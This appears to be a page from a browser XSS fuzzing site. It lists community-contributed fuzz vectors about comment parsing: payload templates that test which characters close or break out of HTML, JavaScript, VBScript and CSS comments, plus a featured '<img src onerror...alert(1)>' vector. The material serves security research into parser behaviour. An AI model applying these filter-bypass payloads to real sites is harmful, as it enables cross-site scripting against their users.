Featured vector

Default Browser 0.0
<!-- sample vector --> <img src onerror0x0c=0x0calert(1)>

Fuzz vector cloud

Anchor Attributes CSS Closing Comments HTML HTML5 JavaScript Property Protocol Script URL XSS attribute bla bypass challenge char comment data encoding entities entity event events expression flash for fun handler href img innerHTML navigateURL onload prompt properties regex space src string style svg tag tags test testing uri vbscript xml

3,403,239 Successful fuzzes

Fuzz Vectors

Searching for "Comments"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
Characters that close a HTML comment 4 <!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> @irsdl
Things that break from URIs javascript comments <a href="javascript://*chr*logChr(*num*)">aaa</a> @0xAli
Characters that escape JavaScript single line comments <script> // hmm *chr*logChr(*num*) </script> @peksa
Characters that close a HTML comment 0021 <!--*chr*><img src=xxx:x onerror=log(*num*)> --> @matttiko
Characters to break VBScript comments <script language="vbscript"> '*chr*log(*num*)' </script> @0x6D6172696F
Characters allowed in between dashes to end html comments <!-- -*chr*-> <script>logChr(*num*)</script> --> @JohnathanKuskos
Characters that close a HTML comment 3 --><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> --> @DOMXss
Hex characters allowed after asterix in CSS comments <div id="fuzzelement*num*" style="/**\*hex2*/;color:#000000;"></div> @garethheyes
Characters allowed after asterix in CSS comments <div id="fuzzelement*num*" style="/***chr*/;color:#000000;"></div> @garethheyes
Characters that close a HTML comment 002 <!--*chr*<img src=xxx:x onerror=log(*num*)> --> @0x6D6172696F
Characters escaping JS comment delimiters 001 <script>/* **chr*/log(*num*)// */</script> @0x6D6172696F
Characters that close JS Comments '"`><script>/* **chr*log(*num*)// */</script> @garethheyes
Characters that close a HTML comment --><!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> @garethheyes